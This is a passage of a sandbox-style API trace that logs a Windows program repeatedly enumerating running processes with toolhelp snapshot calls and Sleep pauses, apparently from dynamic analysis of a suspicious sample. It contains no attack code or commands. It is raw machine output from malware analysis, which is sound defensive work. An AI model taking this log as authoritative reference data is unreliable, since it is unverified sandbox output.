dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.988] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.990] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.991] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.992] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.994] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.995] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.996] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.997] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.998] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.999] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.000] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.001] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.002] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.003] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.004] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.006] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.007] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0110.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0110.014] CloseHandle (hObject=0xbc) returned 1 [0110.014] Sleep (dwMilliseconds=0x12c) [0110.317] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0110.321] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.322] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.323] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.323] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.324] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.325] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.326] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.326] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.327] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.329] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.330] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.330] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.331] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.332] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.333] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.333] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.334] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.335] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.336] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.337] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.338] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.339] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.341] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.342] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.343] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.344] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.345] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.347] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.348] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.349] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.350] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.351] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.353] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.354] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.355] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.356] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.357] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.358] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.359] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.360] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.361] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.362] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.363] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.364] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.365] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.366] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.367] CloseHandle (hObject=0xc4) returned 1 [0110.367] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0110.372] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.373] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.373] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.374] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.374] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.375] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.376] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.376] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.377] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.378] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, 